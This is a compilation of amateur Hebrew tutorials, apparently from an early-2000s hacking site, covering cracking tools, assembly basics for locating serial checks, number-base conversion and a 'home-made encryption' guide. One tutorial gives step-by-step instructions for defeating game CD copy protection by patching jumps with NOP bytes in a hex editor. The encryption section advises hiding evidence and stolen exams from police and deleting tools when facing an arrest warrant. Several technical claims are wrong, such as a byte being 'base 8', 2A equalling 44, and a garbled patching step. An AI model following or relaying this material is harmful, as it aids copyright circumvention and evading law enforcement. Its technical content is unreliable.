אני יכול לתת לך עוד שמונת אלפים ארבע מאות דוגמאות אבל אני מאמין שתפסת את העיקרון...

 

 

ד. חוקיות

=========

פיצוח אינו חוקי. כי אתה עובר על זכויות יוצרים וכו' , אבל אם אתה לוקח על עצמך את הסיכון

שיתפסו אותך (מאוד נדיר) אז סבבה. אני מאמין שכל מה שאתה עושה במחשב שלך הוא עניינך בלבד וכל עוד

לא תמכור אותו או תשווק אותו הוא נחשב לדי חוקי, אבל החוק לא כזה... :0)

 

ה. ידע נדרש

===========

לא כל אחד יכול לפצח. אם אתה נהנה לצ'טט באינטרנט ולשחק במחשב אולי עדיף שתלמד משהו אחר.

מי שרוצה להיות מפצח חייב שיהיה לו ידע באלגוריתמיקה כלשהיא (הכוונה לשפת תכנות) , אני לא מתכוון

לשפת תכנות בסיסית מאוד כמו QBASIC אלא מהשפות היותר מתקדמות כדוגמת VB או ++C אפילו פסקל תתפלא

או לא יכולה לעזור לך ביסודות הפיצוח או יותר נכון ביסודות התכנות שמנחים את הפיצוח.

כשאני מדבר על אלגוריתמיקה אני מדבר על כל מה שקשור בלולאות, תנאי, פונקציות וכל מה שלוגיקה ממוחשבת כוללת בתוכה.

 

 

ו. ידע חובה!

============

אני ממליץ אחרי שיש לך ידע בשפה מסוימת או בכמה שפות להתחיל ללמוד את השפה אסמבלי (שנקראית גם אסמבלר או בקיצור ASM)

שהיא הבסיס לפיצוח.

השפה אסמבלי היא הבסיס לכל השפות ניתן לומר מפני שהיא ממירה את התוכניות שאתה יוצר כמעט באופן ישיר אל המחשב דבר שיעזור לך

לנתח פעולת תוכניות שונות. (מדריך על אסמבלר ניתן למצוא באתר IHC)

 

 

ז. כלים נפוצים למפצח

====================

אוקיי, בהיותך מפצח תתקל באחד מהכלים הבאים (שאני לרוב משתמש):

 

*W32 - סוג של דיסאמבלר - דיסמבלאר הוא כלי שנותן לך לראות את קוד התוכנית אותה אתה מנתח בשפת אסמבלי. משתמשים בדיסאמבלר

W32 בד"כ אם כי אני מאמין כי דיסאמבלרים אחרים כדוגמת זה של BORLAND גם יכולים להיות טובים.

 

*Hworks - נקרא גם בשם HW , כלי זה מציג את התוכן של קובץ בבסיסים הקסדצימליים (בסיסי 16) , לעוד פרטים על הבסיס

ההקסדצימלי קרא את המדריך שלי על "בסיס הקסדצימלי שנמצא ב IHC או קרא מכל מקום אחר. דוגמא לעוד עורך הקסדצימלי טוב

חוץ מ Hworks הוא AXE .

 

*SoftICE - כלי זה הדיבאגר , החזק מבין כולם כנראה - נותן לך תצוגה "חיה" של הקובץ אותו אתה מנתח באסמבלי , כלומר הוא נותן לך

לבדוק תוך כדי ריצה של התוכנית מה קורה שם, וע"י הזנת נקודות עצירה BPX  לתוכנית ניתן לראות שיגרות חיוניות שיעזרו

לך להוציא את מה שאתה רוצה מהתוכנית.

אני אישית לא משתמש ב SOFT ICE כי היא עושה לי בעיות , אבל רוב המפצחים משתמשים בה ואולי גם אני יעבור

לדיבאגר הזה בחזרה (פעם השתמשתי בו...) . חוץ מהדיבאגר הזה תוכל להשתמש גם בדיבאגרים כדוגמת PC-WATCH או TRW שנחשבים

לדיבאגרים מצוינים וכן לעוד הרבה רבים...

 

*מפצח משחקים Game Cracker - מוכר פחות למפצחים , כלי זה נותן לך להוציא ממשחק מחשב מסוים נקודות ערכים חשובות,

כדוגמאת : נקודות חיים, יריות וכו' הוא עוזר בבניית TRAINERS ונותן למפצח את כל המידע לגבי נתוני המשחק.

מפצח משחקים נמצא (לפחות שלי) בתוך אחד ה TRAINERS שהורדתי.. ברגע שאכתוב מדריך על טריינרים (מדריך ענק) אכתוב גם

איפה למצוא את מפצח המשחקים ומה ניתן לעשות איתו.

 

*יוצר פאטצ'ים - Patch Creator - בזה משתמשים כדי ליצור קראק (קובץ שמשנה את ההגנה של תוכנה מסוימת) . אם

ברצונך ליצור קראק משל עצמך אתה צריך את התוכנה הזאת כי היא יותר נוחה, אם כי יש מפצחים שבונים ללא שום יוצר פאטצ'ים.

 

 

ח. הורדת הכלים

==============

כל אתר קראקינג שמכבד את עצמו ישים את הכלים האלה. נכון לעכשיו ניתן למצוא את הכלים באתר IHC - www.ihc-net.org

או שפשוט לכו למנוע חיפוש ותקישו Cracking .

אפשר גם להוריד את רוב התוכנות ויותר באחד מהאתרים האלה : http://hackersclub.com או www.crackstore.com

 

By Zeos

אסמבלר למפצח

=============

שלום לכולם זהו המדריך הראשון שלי בנושא פיצוח במדריך תמצא פקודות בסיסיות

באסמבלר שיעזרו לך להבין מה קורה בתוכנה שאתה מנסה לפצח

 

CALL

----

 

משמש: קריאה לכתובת

פעולה: קורא לפונקציה בכתובת "הכתובת"

דוגמא : CALL 10284312

 

אחרי הקריאה לפונקציה התוכנית תמשיך לשורה הבאה

 

 

CMP

---

 

פעולה: השוואה כלשהי בתוכנית למשל השוואה בין הסריאל שאנחנו הכנסנו לסיראל

של התוכנית, בדיקה אם התוכנית רשומה

דוגמא : CMP AX,03h

 

בדרך כלל תמצא קפיצה כלשהי אחרי ההשוואה

 

JMP

---

 

פעולה: הפקודה הזאת די דומה ל goto היא קופצת למקום כלשהו בתוכנית

דוגמא : JMP 00402011

 

יש כמה סוגים של קפיצות לדוגמא:

 

je - קפיצה אם הערך שווה נכון

jne - קפיצה אם הערך שווה לא נכון

 

הקפיצה באה בדרך כלל השוואה (cmp) לדוגמא:

 

CMP    RealSerial,BadSerial : השוואה בין הסיראל האמיתי לסיראל שלנו

JNE    GoAwayBadCracker : קפיצה אם הסיראל שלנו לא שווה

 

MOV

---

 

פעולה: העתקת ערך של מילה מהמקור ליעד

דוגמא : MOV AX,DX

 

אתה תראה את הפקודה הזאת המון בתוכנית בדרך כלל זה משמש כפעולת השמה

 

RET

---

פעולה: חזרה מפונקציה

דוגמא : RET

 

בדרך כלל אתה תראה את הפקודה הזאת בסוף פונקציה, היא משמשת כחזרה לקריאה

 

זהו לבנתיים מקווה שעזר לכם.

 

המדריך נכתב על ידי: VbMan

שלחו לי תגובות או שאלות ל [email protected]

איך להפוך מספרים בינארים לעשרוניים וההפך.

בינארי :

 

בינארי היא שפת מכונה שהמחשב מבין.

התחום של בינארי הם המספרים 0,1.

אתם בטח אומרים לעצמכם אז איך אני עושה מבינארי מספרים, אותיות רגילות

אז על מספרים במדריך הזה אני אכתוב על אותיות יותר מאוחר.

במדריך אחר.

איך אני הופך מבינארי לעשרוני.

הסבר ודוגמא:

ניקח את המספר 00110011, בחישוב מהיר הוא מסמל את המספר 51.

אוקי איך עשיתי את זה.

הנה היא הטבלה של הבינארי במחשבים.

128

64

32

16

8

4

2

1

נכניס את הבינארי מתחת.

0

0

1

1

0

0

1

1

 

עכשיו אם יש מתחת לספרה האמיתית 0 אז המספר שווה אפס אבל אם יש אחד אז הוא שווה כמה שכתוב מעל ה1.

למשל:

יש אחד מעל האחד אז זוכרים 1, יש אחד מעל ה 2, זוכרים עוד 2,

וכו' עד שמגיעים ל: 1+2+16+32 = 51.

ברור ? אני אתן לכם פה תרגילים או שתיים:

11001100 = ?

00000010 = ?

בראשון אמור לצאת 204.

בשני אמור לצאת 2.

אני מקווה שהבנתם אם לא תקראו שוב כי זה לא ממש קשה.

עכשיו איך הופכים מעשרוני לבינארי? זה קצת יותר מסובך אבל עדיין נכנס להגדרה של קל.

ניקל את המספר 143 ואז מה עושים ?

128

64

32

16

8

4

2

1

 

יאללה בוא נתחיל, משמאל לימין,

האם 143 נכנס בתיבה של 128, אם הוא גדול מ 128 זה אומר שכן, אז נרשום שם אחד.

עכשיו נשאר לנו 15 (143-128).

נמשיך, 15 נכנס ב 64, לא. נכתוב שם אפס, האם 15 נכנס ב 32, גם לא, נשאיר שם אפס.

15 לא נכנס ב 16, אז נכתוב גם שם 0.

15 נכנס ב 8, כן אז נכתוב שם אחד ונשאר לנו 7 (15-8) .

7 נכנס ב 4, כן נכתוב אחד ונשאר לנו 3 (7-4)

3 נכנס ב שתיים, כן נכתוב שם אחד ונשאר לנו אחד (3-2).

ועכשיו נשאר אחד והוא מתאים בול לאחד בסוף אז גם שם נכתוב 1.

איזה בינארי יצא לנו ?

10001111

הבנתם, אני ממש מקווה אבל אם לא אז תקראו שוב, כי זה נכנס למוח בפעם השנייה

128

64

32

16

8

4

2

1

1

0

0

0

1

1

1

1

אוקי אז עכשיו תתרגלו את זה עד שתעשו את זה בלי דף נייר ובלי מחשבון (שזה הדרך הקלה).

 

By Zeos & Pirs[I]ng

פיצוח הגנות CD \ גרסה 1.1

מאת: Zeos

 

הקדמה: כתבתי את המדריך הזה לצורכי לימוד בלבד, כל נזק שיגרם למחשבך ו\או כל פעילות בלתי חוקית שתעשה הנם על אחריותך בלבד. אם אתה רוצה להפיק כסף מהפיצוח ע"י דרך כלשהי אנא הפסק לקרוא!

 

קריאה מהנה – Zeos

 

אוקיי , אז מה השיטה שאנחנו עובדים עליה?

בשביל לפצח CD , או יותר נכון את ההגנה של ה CD שמונעת ממך לעשות כלשהם פעולות כגון העתקה , שינוי או כל דבר אחר אנחנו נשתמש בשיטה מאוד בסיסית שבעצם מנטרלת את כל פעולות ההשוואה שבודקים את חוקיותו של הדיסק. השיטה מאוד בסיסית ולכן גם מאוד קלה ולא כל כך מקצועית אך היא טובה מאוד לעיתים רבות שכן לא רבים מן המתכנתים שבונים את הדיסקים מתעניינים באבטחתם ואנחנו המפצחים נהנים מכך :) חשוב מאוד : גבה את קבצי המשחק לפני שתעשה כל פעולה אתם – שימוש לא נכון יכול לגרום להרס.

 

כלים וידע:

למעשה, לא כל אחד יכול לפצח :( , לי לקח משהו כמו כמה חודשים טובים עד שקלטתי והצלחתי לפצח ברמה בינונית... הידע שתצטרך צריך להיות כללי מאוד בתחום המחשבים : בסיסים , תווי אסקי אלגוריתמיקה מתקדמת... חוץ מזה עדיף שתלמד קצת אסמבלי שכן אסמבלי נחשבת לשפה גבוהה מאוד ומכנים אותו גם "שפת סף" , שכן היא נחשבת ל"אמא של כל השפות". אם יש לך את הידע המתאים לא תתקל בכל קשיים...

במדריך זה השתמשתי בשני דברים לפיצוח :

 1.דיסאמבלר (עושה הפוך מאסמבלר – הופך קובץ אחרי הידור משפת מכונה לשפת אסמבלי כדי שנבין מה קורה)

 2. עורך הקסדצימלי  Hworks .

 את שני אלה ניתן להשיג ברחבי הרשת..ממש לא בעיה להשיג אותם.

 

שלב 1 : בדיקת הודעת הדיסק.

אוקיי , הרץ את המשחק ללא הדיסק , המשחק לא יעבוד (אל תבהל) , אבל שים לב להודעת השגיאה שקופצת כאשר אתה מפעיל את הקובץ ללא הדיסק . רשום לך אותה וזכור אותה לאחר מכן. יכול להיות שאתה לא חושב שהיא חשובה אבל היא חיונית מאוד למפצח.

 

שלב 2: פותחים את הקובץ להסתכלות ראשונית.

אוקיי , אחרי שרשמנו לעצמנו את ההודעה נעבור לדיסאמבלר W32 ונפתח את קובץ ה EXE שהפעלנו בהתחלה, פעולה זאת לוקחת כמה זמן , שתה משהו וחזור לפה :)

אוקיי , זה גמר לעשות את הפעולות שלו – קדימה לעבודה – לחץ על הכפתור למעלה שכתוב עליו Strn.REF שמפרש לנו את משפטי התוכנית כדי שנבין מה עושה כל מה (תלמד להשתמש בזה עוד הרבה כמפצח...) הכפתור נמצא צמוד לכפתור ההדפסה . או הנה עכשיו אנחנו רואים כל מיני משפטי תוכנית שנוצרו כתוצאה מכל קוד התוכנית באסמבלי – עכשיו בוא נמצא את הודעת השגיאה שרשמנו ממקודם מבין כל המשפטים ששם , לחץ על המשפט פעמיים והדיאסמבלר יזניק אותך למקום שבו נמצאת הפרוצדורה הממונה על המשפט . עכשיו מגיע חלק קצת קשה למי שמבין קצת באסמבלי יהיה קל: כפי שהוסבר למעלה המטרה שלנו זה לנטרל את כל גורמי ההשוואה בתקווה שאחד מהם ינטרל את בדיקת החוקיות של הדיסק. אז אנחנו צריכים למצוא בין כל המשפטים של המשפט. את אותם המשפטים שמורים על קריאה לפונקציה – CALL , קפיצה – JMP או קפיצה כאשר שווה JNE   ואף עוד סוג קפיצה – JE .בקיצור כל פקודה המראה על קריאה , או קפיצה . שים לב שכאשר אתה עובר על משפט קפיצה, קריאה - השורה תסומן בצבע ירוק, עכשיו כל שורה שכזאת בתוך השיגרה של ההודעה בלבד תסתכל למטה ותראה נתונים על המשפט – תראה שכתוב Offset xxxxh @ כאשר XXXX הוא המספר שאנחנו צריכים – ללא ה H . כתוב כל מספר כזה שמצאת בשורות – אל תשכח לוודא שהשורה הופכת להיות בצבע ירוק מתי שיש את הפקודות אותן אנו צריכים לנטרל.

 

שלב 3: נטרול ההגנה

אוקיי מפה זה כבר די קל, צא מתוך W32 ולך לעורך הקסדצימלי HW שלנו , פתח את הקובץ והקש F5 שזה GOTO – רשום את המספר הראשון והעורך יזניק אותך למקום שלו בעורך ההקסדצימלי , בשלב הזה בוא ותלמד משהו קטן : נגיד והמספר שרשמנו הוא 0003EB2A זה אומר כי יש לנו 4 בייט – כל 2 מספרים הם בייט אחד (הקסדצימלי זה בסיס 16 ואילו בייט זה בסיס 8) ככה שהמספר בעצם אמור להראות כך:

00-03-EB-2A כלומר : 8 מספרים = 4 בייט.  אוקיי , אחרי שתפסת את זה בוא ונמשיך... אחרי שהבנת את מספר הבייטים במספר שלך – כתוב במקום כל זוג מספרים את המספר 90 כלומר :     00-03-EB-2A = 90-90-90-90 , אם יש לך עוד מספרים עשה אותו דבר לכולם ושמור את הקובץ . במזל טוב ואם עשית הכל נכון – פרצת את ההגנה של הדיסק – צ'פר את עצמך ושחק במשחק עד הבוקר... :)

 

 

שלב 4: הערות ומסקנות

אם אתה כבר פה בוא ותקשיב קצת על פיצוח. הפיצוח שאנחנו עשינו במדריך זאת היא פריצת הגנה שזאת הפריצה שנחשבת לאחת הקלות . סגנון הפיצוח הזה הוא מאוד נפוץ ואפשר לראות זאת מכיוון שבכל מקום כמעט אפשר לקנות דיסק צרוב במעט מאוד כסף מה שדי מעציב את היוצרים החוקיים אך מעציב גם אותנו הצרכנים שנאלצים לשלם מחיר יקר רק בגלל "שהמשחק חוקי" ולכן זאת גם את המטרות שבפיצוח. עוד סוג נוסף של פיצוח הוא פיצוח הסיסמאות החביב עליי. בפיצוח הזה לוקח המפצח תוכנה עם מגבלת סיסמא ומנסה להוציא את האלגוריתם של הסיסמא או את הסיסמא הנכונה לנתונים מסוימים ... יכולה להיות קלה ויכולה להיות גם קשה מאוד ולעיתים גם קשה וכמעט בלתי אפשרית.

 

מקווה שנהניתם מהמדריך – ZEOS  (נמצא בד"כ בשרת ivrit.co.il  חדר #אבטחה או #עברית )

 

אם אתה מתעניין בפיצוח ורוצה להיכנס קצת יותר לעומק חפש את המילה CRACK במנועי החיפוש השונים.

 

 

תודה רבה לאנשי HACKER.CO.IL שדחפו אותי לפיצוח :)

 

By Zeos

קידוד והצפנה

 

תוכן עניינים:

 

* מה זה הצפנה ?

* איך אני מצפין ?!?!

* למה זה טוב ?

* בטוח שלא יגלו את זה ?

* לינקים .

* קרדיטים.

 

 

=============

מה זה הצפנה ?

=============

 

בתהליך הצפנה אתה בעצם משנה מה שאתה כתבת למשהו אחר, שזה נראה ממש זוועה, לא ברור.

אבל בעצם כל מה שכתבת נמצא שם רק זה השתנה כדי שאנשים לא מורשים (שוטרים) לא יקראו את זה.

לכל אלגוריתם של הצפנה יש סוג הצפנה אחר. למשל, התוכנה A איך היא מצפינה.

היא קבעה שכל אות בפה שלה תהיה משהו אחר:

A תהיה בשפה שלה 3,

B תהיה בשפה שלה 6,

C תהיה בשפה שלה 9,

D תהיה בשפה שלה 12.

אז איך היא תכתוב ABCD ?  היא תכתוב את זה ככה : 36912.

זה לא חייב להיות ככה אבל זה בעצם הבסיס.

הצפנה הוא שינוי המקור אבל לא שינוי מלא, שינוי התוכן, התסרת התוכן ע"י תווים מוזרים.

כאשר אתה תפתח קובץ מוצפן כזה או אחר אתה תראה דבר שאתה לא תידע מהזה,

אתה תחשוב אולי שזה קובץ לא גמור, הרוס, סתם חירבוש אבל זה לא נכון.

דוגמא : זה טקסט שראיתי ברשת והוא היה מוצפן, תגידו לי מה הבנתם ממנו...

-------------------------------------------------------

KASFONA SFKNASF SDIFH@W#$(&@#$JTK WDRGP VSMV SDPOG v12.

-------------------------------------------------------

עכשיו מצאתי את סוג ההצפנה ופיצחתי את זה, רוצים לדעת מה יש בפנים ?

-------------------------------------------------------

decrypt -> KASFONA SFKNASF SDIFH@W#$(&@#$$JTK WDRGP VSMV SDPOG v12.

undecrypt -> Its a very simple program to decryypt, i think u can do it.

-------------------------------------------------------

נו מה הבנתם מזה ?

* הצפנה זה דבר נחמד, אבל רק כשאתה משתמש בו.

* לא קשה לפענח הצפנה רק צריך כלים טובים.

אני מקווה שהבנתם פה את הכללי ובואו נמשיך.

 

 

==================

איך אני מצפין ?!?!

==================

 

אוקי יש שתי דרכים שלדעתי הם עיקריות להצפין....

1. לכתוב תוכנה שמצפינה את הכל לפני איך שאתה קובע (בתנאי שאתה כתבת אותה).

2. להשתמש בתוכנה אשר מישהו כבר כתב, רק שתדעו רוב התוכנות עושות את זה עם סיסמא.

   אתה צריך לכתוב את הסיסמא הנכונה כדי שזה יפתח את ההצפנה.

 

הסברים:

 

1. אם אתם כותבים תוכנה שמצפינה, איך היא צריכה להיות ?

אתה מגזיר למחשב שיבדוק איפה הוא מאתר את התתוים הבאים:

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789,.-+!@#$%^&*.

ואז פשוט מאוד הוא מחליף אותם במה שאתם קובעים, למשל תקבעו ש A יהיה Z הוא יעשה את זה.

 

&& אם תם רוצים לכתוב תוכנה שפותחת הצפנה שאתם עשיתי אז עושים ההיפך:

אתה מגזיר למחשב שיבדוק איפה הוא מאתר את התתוים האלה שנתת לו לשנות את התתוים הרגילים.

למשל אמרת ש A זה Z, אז אתה אומר שכשהוא יראה Z הוא ישנה את זה A.

 

2. אתם מחפשים תוכנה באינטרנט, אתם פותחים קובץ טקסט כלשהו ולוחצים על decrypt,

הוא מבקש מכם סיסמא שתם קובעים, אתם מקישים ומאשרים, לאחר מכן הוא יוציא לכן קשקוש אמיתי.

ועם אתה רוצים לפתוח את זה אתם לוחצים על undecrypt, הוא מבקש סיסמא.

אם אתם מקישים את הנכונה יופי, אם לא אכלתם אותה.

אוקי אם תרצו לבדוק את זה לבד, תורידו או תבנו תוכנת קידוד והצפנה ותנסו, אם אתם לא מאמינים לי ;=).

 

============

למה זה טוב ?

============

 

זה משמ טוב להרבה דברים, כי זה בעצם מסמל את הפרטיות של כל הבני אדם.

בטוח קראתם את הכתבה שלי על ה FBI והציתות באתר של הארגון אז זה בעצם מנפץ את זה.

למשל יש לכם טקסט סודי ממש סודי , על כל הדברים הלא טובים שעשיתם, הבולשת עושה פשיטה,

מוציאה את המחשב מוצאת הקובץ , ולא מצליחה לפצח אותו.... לא קרה כלום לא נדפקת ולא כלום.

אבל יש פה בעיה קטנה... שאם תעבדו אם תוכנה שכבר כתובה יש סיכוי שאיזה פלצן בבולשת יגלה אותה

ויפתח את הקובץ בלי בעיות אז אכלצם אותה. אז מה אני מעייץ ?

לכתוב תוכנה לבד, לשים שם את הקידוד הכי נוראי שאפשר (מבחינה טובה) שאף אחד לא ידע.

שיהיה לך איפשהו כמו מין מפת תווים שתידע מה זה מה.

אחרי שאתה מכין תוכנה ואתה בסכנה (יש לך תיק , צו מעצר) אני מייעץ למחוק את התוכנה,

כדי שלא יהיה להם איך לפתוח את הקובץ ואל תפיץ אותה כי אתה מגדיל סיכוי להידפק.

תקעו איפשהו מפת תווים שתידעו אחרי איך לכתוב תוכנה אנטי, שתפתח את ההצפנה.

זה טוב לעוד דברים:

1. להסתיר מידע סודי עליכם או על מישהו אחר.

2. כתבתם מכתב אהבה לילדה ואתם לא רוצים שיראו אותו עד שתשלח לה אותו (איזה חמוד :)) .

3. גנבתם מבחן מהמחשב בבית ספר ולא רוצים שיגלו אותכם בבית, וואלה.

ועוד הרבה הרבה דברים אחרים.

 

=====================

בטוח שלא יגלו את זה ?

=====================

 

תשמעו אני לא יכול להבטיח שלא יגלו את זה , זה תלוי איך כתבתם ובאיכות של התוכנה.

אם תכתבו תוכנה שלוקחת אות ומזיזה אותה תו אחד בטווח זה לא טוב, למשל אמרת ש B יהפוך ל C.

זה ממש קל לגלות אבל אם משהו אחר, תנסו לעשות את זה כמה שיותר מסובך ורחוק בטווח.

למשל ש A יהיה W או משהו כזה.

אני לא יכול שוב להבטיח שלא יגלו מה בפנים, כמו שאני לא יכול להבטיח שלא יפרצו לכם למחשב

מתישהו או שלא יתפסו אתכם אם תפרצו לאתר, לא תמיד יתפסו אבל אני ואף אחד אחר לא יכול להבטיח

שלא.

מבינים מה אני אומר, זה עניין של סיכון.

לדעתי האישית תעבדו רק אם תוכנות שאתם כתבתם, ואם יש לכם בעיות אז קחו את התוכנה שיש למטה,

ותשנה את המבנה שלה.

אבל בחיים, אבל בחיים אם אתם יודעים שיש סיכוי שאיזה שוטר יבוא לקחת את המחשב שלכם איזה יום,

אל תשתמשו בתוכנות כתובות ותוכנות דפוקות.

 

========

לינקים .

========

 

אתרים על קידוד והצפנה אפשר למצוא בכל חור ברשת, אבל מה מיוחד בטקסט שלי :-9 ?

אני נותן לכם פה קישור לתוכנה שהיא בעצם תוכנת הצפנה, שנכתבה ע"י בן אדם מאוד חכם (לא אני).

אז אם אתם רוצים קחו אותה, תקמפלו אותה ותבלו איתה.

כל זאת כמה לינקים לכיף :

 

www.astalavista.com

hack.box.sk

blacksun.box.sk

By Pirs[I]ng
בסיס הקסדצימלי – המרה

 

מאת : Zeos

במדריך זה תלמד איך להמיר מבסיס הקסדצימלי לעשרוני ולהפך . לא סיפור גדול , אבל חשוב שתדע כדי לבצע דברים מורכבים יותר בעתיד. המדריך הזה הוא רק חלק ממדריך ענק של בסיס הקסדצימלי שאני ימשיך להכין אם יהיה לי כוח :)

{מדריך זה נכתב לצורכי לימוד בלבד – האחריות לשימושו עלייך בלבד }

יאללה!

 

מה זה הקסדצימלי ?
הקסדצימלי הוא בסיס 16, מה זה בסיס אתה שואל ובכן בסיס הוא הגורם שאותו מעלים בחזקה. אני יודע שאני קצת סוטה מהנושא אבל בצורה מתמטית פשוטה בסיס זה כמו ה X כאן :   xA  וה A הוא המעריך שלו . אז כן אם הבנת נכון – הקסדצימלי הוא בסיס 16 ו ה-A  הוא המעריך שלו, תלמד חזקות ושוב לפה.

 

אוקיי פירוש למילה הקסדצימלי (Hexadecimal) הוא בעצם מיוונית – HEXA שזה 6 ו DECIMAL שזה 10 – דצימלי הוא הבסיס המוכר לכולנו – בסיס 10 , עשרוני. וכמו כן יש גם את הבסיס בינארי – בסיס 2 שהוא הבסיס הבסיסי ביותר ומשתמשים בו בגלל העובדה שמחשב יכול לקלוט רק אותות חשמליים של כבוי ודלוק ולכן 0 ו 1 שהם המספרים היחידים בבסיס זה מועברים למחשב. בבסיס ה הקסדצימלי משתמשים כדי לשנות פקודות ועוד דברים משום העובדה שהוא נוח לעבודה דרך שפת סף (אסמבלר) כי רוב הפקודות בה מתורגמות למספרים הקסדצימליים פשוטים יחסית (עוד פרטים במדריך  אסמבלר) .

 

שיטות ספירה

טוב , עכשיו נכון שכאשר אתה סופר רגיל אתה סופר כך :

1 , 2, 3, 4, 5, 6, 7, 8, 9, 10 ...

זאת שיטת הספירה המקובלת הנקראת גם השיטה העשרונית  או הדצימלית.

אוקיי עכשיו למה הבלטתי את 9 ו 10 ? ! זאת משום שבנקודה הזאת בעצם המספר מקבל עוד ספרה מצד שמאל ומתאפס מחדש. כך גם בבסיס הקסדצימלי . כמו שבעשרוני אנו סופרים עד 9 ואז מוסיפים  לעשרות 1 ומאפסים את היחידות  (וזאת משום שמבחינה תיאורטית אין כזה דבר "עשר אחדות" אלא יש "אחד עשרות") .

בקיצור , בהקסדצימלי זה דומה – אתה סופר עד 15 ואז מוסיף אחד לספרה שמאלית רק שבהקסדצימלי הספרה השמאלית שווה לכפולות של 16 ולא לכפולות של 10.

לא הבנת , לא נורא עוד מעט תבין. עכשיו בהקסדצימלי סופרים עד 9 כרגיל ואז מ 10 ועד 15 ישנם אותיות כדלקמן:

עשרוני – הקסדצימלי

1 – 1                         

2 – 2

3 – 3

4 – 4

5 – 5

6 – 6

7 – 7

8 – 8

9 – 9

10 – A

11 – B

12 – C

13 – D

14 – E

15 – F

 

 

 

LET THE GAME BEGIN!

 

נגיד שהבנת איך זה הולך אז בוא נתחיל להמיר מ הקסדצימלי לעשרוני כי זה יותר קל.

טוב הסתכל בטבלה הבאה שמייצגת את המספר 12 בבסיס הרגיל (עשרוני) :

 

 

 

 

 

 

1

2

1000000

100000

10000

1000

100

10

1

 

כמו שבוודאי הספקת להבין בטבלה הזאת מוצג המספר 12 כאשר הוא מחולק ל 1 עשרות ועוד 2 יחידות , פשוט וקל . וכן גם שים לב שככל שהולכים בטבלה התחתונה שמאלה כך גם נכפל המספר בעשר , כלומר שכל מספר הוא כפולה של עשר בעצמו – חזקה שלו . ככה ש 1 זה עשר בחזקת 0 ועשר זה עשר בחזקת אחד , ומאה זה עשר בחזקת 2 .

 

 

 

אותו סיפור גם בהקסדצימלי :

 

65536

4096

256

16

1

 

נגיד וננסה לכתוב את המספר בהקסדצימלי (שים לב ש 12 הוא C לפי הטבלה למעלה) זה אמור להראות כך:

 

 

 

 

C

65536

4096

256

16

1

כי בעצם כופלים אותו בעצמו.

בוא נלך על מספר טיפה יותר גדול : המספר 2A שבעשרוני זה 44

למה? בוא ותראה , בעצם אפשר לחלק את 2A ככה :

 

 

 

 

2

A

65536

4096

256

16

1


אז מה בעצם יש כאן ? בשביל לקבל את התוצאה מה נעשה בדיוק כפי שעושים בעשרוני – ניקח את 12 הקודם זה בעצם 1 * 10 ועוד 2 * 1 .

 אז פה המספר 2A זה יהיה 2 * 16 שזה 32 ועוד A * 1 –  A זה בעצם 10

אז זה שווה ל 1 * 10 כלומר : 32 + 10 שזה שווה ל 42

מסובך ? אולי השרטוט הזה יעזור לך :

ניקח את 42 בעשרוני ונגלה שהוא שווה ל:

4 * 10 = 40

2 * 1 = 2

 

40 + 2 = 42

 

עכשיו ניקח את 2A בהקסדצימלי ונגלה שהוא שווה ל:

2 * 16 = 32

  A = 10 – לפי הטבלה

10 * 1 = 10

 

32 + 10 = 42

 

בוא וקח דוגמאות אחרות :

86A =

A * 1 = 10

6 * 16 = 96

8 * 256 = 2048

 

10 + 96 + 2048 = 2154

 

כלומר : 86A = 2154

 

 

 

4C91

 

1 * 1 = 1

9 * 16 = 144

C * 256 = 3072

4 * 4096 = 16384

 

1+ 144 + 3072 + 16384 = 19601

 

כלומר 4C91 = 19601

 

 המרה מעשרוני להקסדצימלי

עכשיו העסק אמור להיות קל אם הבנת את החלק שלמעלה ועברת את כיתה ג' :

בשביל להמיר מעשרוני להקסדצימלי מה שעושים זה פשוט, לחלק את המספר ב 16 , למה ב- 16? עקרון ההמרה שיוסבר כאן הוא פשוט פירוק ספרות ולאחר מכן שרשור שלהם ביחד ( "לחבר" אותם – נגיד 1 ו 2 יהפכו להיות 12 ) , בסדר נחזור למספר 12 העשרוני שלנו:

תחלק אותו ב –10 ותקבל

12 / 10 = 1(2)

                     1 / 10 = 0 (1)

 

בסדר... 99% שלא הבנת כלום , מה שקורה למעלה הוא בדיוק מה שהסברתי – פירוק המספר והשארית שלו היא המספר עצמו ....

12 חלקי 10 קיבלת 1 ושארית 2 מה שניתן לתרגום כ 1 עשרות ו 2 יחידות

לאחר מכן "שמרת" את ה- 2 זאת השארית וחלקת את ה 1 שקיבלת שחילקת ב 10 ממקודם וקיבלת 0 ושארית של 1 מה שאומר 1 עשרות.

2 יחידות ו 1 עשרות – 12

די מסובך להסביר את זה ככה... אם לא הבנת ככה הנה עוד שיטה : בעצם בהמרה עשרונית אתה מחלק

ב –1 0 עד  שאתה מקבל במספר 0 ובשארית את המספר שחילקת עליו בעשר (1 במקרה שלנו) ואז כל פעם שאתה מחלק את השארית אתה שומר וממשיך לחלק וכל מספר שמתווסף אתה מחבר משמאל למספר כך שקיבלת בהתחלה בשארית 2 ואחר כך 1 – שרשר אותם (לשים אותם אחד ליד השני) ותקבל 12

 

אוקיי איך הדבר עובד בבסיס 16 ?
נגיד המספר העשרוני הבא :  22

מה נעשה אתו ? בדיוק מה שעשינו בעשרוני רק שעכשיו נחלק ב 16 ולא ב- 10!

22 / 16 = 1 (6)

1 / 16 = 0 (1)

 

אוקיי 6 ו –1 – שרשר וקיבלת 16

 

דוגמית אחרת : 58

58 / 16 = 3 (10)

3 / 16= 0 (3)

 

10 בהקסדצימלי זה A  מה שיתקבל בסוף הוא 3A

 

דבר חשוב מאוד למי שמשתמש במחשבון כאשר תנסה לחלק 58 ב 16 תקבל 3.625 או בשברים 3 ו 5 חלקי 8 , עכשיו תשים לב שכאשר אתה מחפש את השארית כדי לכתוב אותה בצורה עשרונית אתה חייב להפוך את המכנה ל 16 מה שבמקרה שלנו לכפול את המכנה והמונה של 5 חלקי 8 ב –2 ואז תקבל 10 חלקי 16 . וזאת התשובה לשארית ולא 5.

לידע כללי , העיקרון פועל גם בעשרוני כי הרי נגיד שאתה רוצה לכתוב את השבר חצי (1 חלקי 2 ) בעשרוני כאשר הוא תחת בסיס עשר, אז אתה חייב לכפול את המונה והמכנה ב – 5 (כי 2 * 5 שווה ל 10 ) ואז אתה מקבל 0.5 אותו דבר בדיוק קורה גם ב הקסדצימלי כי אתה חייב "לכתוב את המספר" תחת בסיס 16 ולא תחת בסיס אחר.

 

דברי סיכום:
